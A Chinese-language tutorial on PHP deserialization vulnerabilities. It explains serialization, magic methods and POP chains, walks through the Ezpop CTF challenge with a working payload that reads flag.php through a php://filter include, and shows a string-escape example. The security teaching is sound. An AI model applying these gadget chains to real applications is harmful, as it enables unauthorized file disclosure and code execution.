目錄

• 引文
• 簡介
• 基礎知識
• 序列化
• 反序列化
• 屬性
• 魔術方法
• POP鏈
• [MRCTF2020]Ezpop
• PHP字符串逃逸
• 結語

引文

上一篇給大家帶來了XSS跨站腳本攻擊漏洞不知道大家學的咋樣了，今天給大家帶來另一個漏洞，PHP的反序列化漏洞，這也是我在CTF比賽中遇到過最多的也是比較考察邏輯思維的一種漏洞。

簡介

PHP反序列化是一個非常常見的漏洞,利用難度相比于文件上傳等漏洞相對較困難，漏洞的形成的根本原因是程序沒有對用戶輸入的反序列化字符串進行檢測,導致反序列化過程可以被惡意控制,進而造成代碼執行、getshell等一系列不可控的后果。

基礎知識

在了解反序列化之前先看看反序列化與序列化：

序列化

序列化就是將 對象object、string、array、變量 轉換成具有一定格式的字符串，方便保持穩定的格式在文件中傳輸，以便還原為原來的內容。這個應該很好理解，學過JAVA反序列化的可以按照JAVA的去理解，只不過用到的函數不一樣罷了，下面是一個序列化的例子：

<?phpclass XINO{    var $test = "123456";}$class1 = new XINO;$class1_ser = serialize($class1);print_r($class1_ser);?>

輸出字符串：

O:4:"XINO":1:{s:4:"test";s:6:"123456";}

O代表存儲的是對象（object）,4表示有4個字符，XINO表示對象名，1表示有一個值，括號里的以此類推。

反序列化

與序列化相對應，從序列化后的結果中恢復對象（object）。用法和上面的序列化函數差不多，只是作用相反，會恢復被序列化的字符串流。函數為:unserialize。

屬性

了解完序列化與反序列化，下一個要了解的我認為是php的屬性，有基礎的小伙伴可能會知道php的屬性有：public（公有），protected（受保護）或 private（私有）。

由于變量的屬性不同，序列化后的結果也會有一些細微的差異，這是要十分記住的點，也是個人在學習中經常出錯的點：

public：屬性被序列化的時候屬性值不會更改。

protected：屬性被序列化的時候屬性值會變成 %00*%00屬性名

private：屬性被序列化的時候屬性值會變成%00類名%00屬性名

上面這些要牢牢記住，有時候反序列化攻擊不成功也許并不是反序列化利用鏈不對，而是這些細微的點出錯了。

魔術方法

所謂魔術方法，個人理解的是當達成某個特定條件時會自動調用的方法，而在php反序列化中，常用的魔術方法與觸發條件如下：

__construct 當一個對象創建時被調用，
__destruct 當一個對象銷毀時被調用，
__toString 當一個對象被當作一個字符串被調用。
__wakeup() 使用unserialize時觸發
__sleep() 使用serialize時觸發
__destruct() 對象被銷毀時觸發
__call() 在對象上下文中調用不可訪問的方法時觸發
__callStatic() 在靜態上下文中調用不可訪問的方法時觸發
__get() 用于從不可訪問的屬性讀取數據
__set() 用于將數據寫入不可訪問的屬性
__isset() 在不可訪問的屬性上調用isset()或empty()觸發
__unset() 在不可訪問的屬性上使用unset()時觸發
__toString() 把類當作字符串使用時觸發,返回值需要為字符串
__invoke() 當腳本嘗試將對象調用為函數時觸發

比如下面代碼：

<?php class TestClass {public $foo;public function __construct($foo) {$this->foo = $foo; } public function __toString() {return $this->foo; } } $class = new TestClass("Hello");echo $class; // 運行結果：Hello ?>

我們新定義一個了一個TestClass類，由于一個新對象被創建，觸發__construct，echo該類時，對象被當作了字符串調用，于是觸發__toStrng()方法，最后輸出Hello。

POP鏈

學完上面的基礎知識后，我們可以引入POP鏈的知識了，當注入點存在普通的類方法中，我們就不能調用方法了，所以我們需要找到普通類與魔術方法之間的聯系，也就是構造POP鏈，理出一種邏輯思路，通過這種邏輯思路來構造一條pop鏈，從而達到攻擊的目的。

下面給大家帶來一個簡單的例子：

[MRCTF2020]Ezpop

打開靶機發現網站源碼：

Welcome to index.php<?php//flag is in flag.php//WTF IS THIS?//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95//And Crack It!class Modifier {    protected  $var;    public function append($value){include($value);    }    public function __invoke(){$this->append($this->var);    }}class Show{    public $source;    public $str;    public function __construct($file="index.php"){$this->source = $file;echo "Welcome to ".$this->source."<br>";    }    public function __toString(){return $this->str->source;    }    public function __wakeup(){if(preg_match("/gopher|http|file|ftp|https|dict|../i", $this->source)) {    echo "hacker";    $this->source = "index.php";}    }}class Test{    public $p;    public function __construct(){$this->p = array();    }    public function __get($key){$function = $this->p;return $function();    }}if(isset($_GET["pop"])){    @unserialize($_GET["pop"]);}else{    $a=new Show;    highlight_file(__FILE__);}

這是一道比較經典的POP鏈題目，可以正著推或者反著推，本次我們反著推，我們一步一步分析：

Modifier類

class Modifier {    protected  $var;    public function append($value){include($value);    }    public function __invoke(){$this->append($this->var);    }

可以看到有利用點include來進行文件包含，php偽協議來訪問flag.php。而要想觸發append函數， _invoke函數被調用時會觸發include函數。

我們看TEST類，類中有 _get() 魔術方法，將this->p設為一個構造好的Modifier對象。再看看show類，其中有toString魔術方法，在一個對象被當作一個字符串使用時調用，當echo一個對象時會自動觸發這個方法。返回了 $this->str->source，最后的一步是讓source 等于對象，進而觸發 __toString方法。

最后的構造的POP鏈payload為：

<?phpclass Modifier {	protected  $var="php://filter/read=convert.base64-encode/resource=flag.php";}class Show{    public $source;    public $str;    public function __construct(){$this->str = new Test();    }}class Test{    public $p;}$a = new Show();$a->source = new Show();$a->source->str->p = new Modifier();echo urlencode(serialize($a));?>

運行一下得到結果：

提交就可以得到結果。

PHP字符串逃逸

學完POP鏈，我們進階講一下PHP字符串逃逸，這也是有一些難度的知識點，可以先簡單理解為SQL注入,這里就簡單講講:反序列化以;}為結束標志，后面的內容則忽略不管。假設我們構造一個序列化字符串

a:3:{s:4:"user";s:24:"flagflagflagflagflagflag";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

如果題目中，將flag過濾，我們的字符串會變成：

a:3:{s:4:"user";s:24:"";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

flag被替換為空了，字符長度不匹配就會向后讀取，因為我們要構造惡意字符串去匹配。從而達到逃逸。

結語

今天比較詳細的講了PHP反序列化漏洞的原理以及應用方法，有興趣的小伙伴可以自己去搭建靶機來進行測試，以上就是PHP反序列化漏洞實例深入解析的詳細內容，更多關于PHP反序列化漏洞的資料請關注其它相關文章！